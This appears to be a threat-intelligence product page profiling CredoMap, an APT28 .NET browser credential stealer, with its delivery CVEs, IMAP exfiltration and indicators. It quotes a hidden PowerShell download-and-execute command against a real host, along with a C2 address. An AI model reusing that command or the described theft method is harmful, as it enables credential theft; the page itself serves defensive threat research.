CredoMap is a .NET information-stealing malware attributed to the Russian state-linked espionage group APT28, also known as Fancy Bear and Sofacy. It was used in operations targeting Ukraine during the Russia-Ukraine war and has also been associated with broader APT28 intrusion activity against government entities, businesses, universities, research institutes, and think tanks.
CredoMap is focused on harvesting browser-stored access material. Its core functionality includes theft of saved credentials and cookies from Chromium-based browsers such as Google Chrome and Microsoft Edge, as well as collection of cookies and credential-related profile files from Mozilla Firefox. For Chromium browsers, it extracts encrypted browser secrets, recovers the master key via DPAPI, and decrypts stored passwords and cookies, including support for newer AES-GCM-protected data and older DPAPI-only formats. For Firefox, it enumerates profile data and exfiltrates cookies together with files used to store saved logins and cryptographic material.
The malware exfiltrates stolen data over IMAP, embedding collected browser data into mail content sent through a compromised or attacker-controlled email account. Reported campaigns delivered CredoMap through phishing operations, including weaponized documents exploiting Follina (CVE-2022-30190), as well as malicious archive-based lures impersonating trusted organizations. The malware also cleans up after execution by deleting temporary artifacts and self-removing, reflecting an emphasis on low-footprint credential collection rather than long-term persistence.
CredoMap fits APT28’s broader credential-centric espionage tradecraft, where stolen browser credentials and session material can support follow-on account compromise, mailbox access, and intelligence collection. It has been described as a browser credential stealer and as part of an evolving APT28 malware lineage that later included more capable related tooling.
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
2 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
The threat actor weaponized a document to exploit the Follina (CVE-2022-30190) vulnerability that would result in downloading the .NET stealer. | CredoMap is a stealer developed by the Russian APT28/Sofacy/Fancy Bear that was used to target users in Ukraine in the context of the ongoing war between Russia and Ukraine.
The security vulnerability in question is CVE-2023-23397 (CVSS score: 9.8), a critical privilege escalation bug that could allow an adversary to access a user's Net-NTLMv2 hash that could then be used to conduct a relay attack against another service to authenticate as the user. It was patched by Microsoft in March 2023. | The National Cybersecurity Agency of France (ANSSI), in late October, also blamed the hacking outfit for targeting government entities, businesses, universities, research institutes, and think tanks since the second half of 2021 by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap.
1 distinct threat actor attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
CredoMap is a stealer developed by the Russian APT28/Sofacy/Fancy Bear that was used to target users in Ukraine in the context of the ongoing war between Russia and Ukraine.
18 distinct techniques documented for this family, organized by ATT&CK tactic.
Recorded Future revealed details of a spear-phishing campaign orchestrated by APT28 exploiting multiple vulnerabilities in the open-source Roundcube webmail software... The National Cybersecurity Agency of France (ANSSI) ... blamed the hacking outfit for targeting government entities ... by taking advantage of various flaws, counting CVE-2023-23397, to deploy implants such as CredoMap.
cmd.exe /k powershell -NonInteractive -WindowStyle Hidden -NoProfile -command '& {iwr http://kompartpomiar.pl/grafika/SQLite.Interop.dll -OutFile "C:\Users\$ENV:UserName\SQLite.Interop.dll";iwr http://kompartpomiar.pl/grafika/docx.exe -OutFile "C:\Users\$ENV:UserName\docx.exe";Start-Process "C:\Users\$ENV:UserName\docx.exe"}'
The implementation of the deletion function consists of creating a cmd.exe process that deletes the DLL file shown above... Processes spawned cmd.exe “/C Del <Files>”
The malware aims to steal the credentials and cookies from Google Chrome, Mozilla Firefox, and Microsoft Edge.
The process retrieves the path of the current executable and then connects to a hard-coded C2 server (162.241.216.236) on port 143 (IMAP) using hard-coded credentials.
26 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
IPs, domains, and DNS infrastructure linked to this family.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Other indicator types observed in public reporting.
10 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
APT28 stealer used in cyberattacks and credential theft operations.
A browser credential stealer used as one component in APT28's disposable modular toolkit.
A .NET information stealer used by APT28 to steal browser credentials and cookies from Google Chrome, Mozilla Firefox, and Microsoft Edge, then exfiltrate the data to a C2 server over IMAP.
A .NET stealer attributed to APT28 that steals credentials and cookies from Google Chrome, Mozilla Firefox, and Microsoft Edge, then exfiltrates the data to a C2 server over IMAP using APPEND commands.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.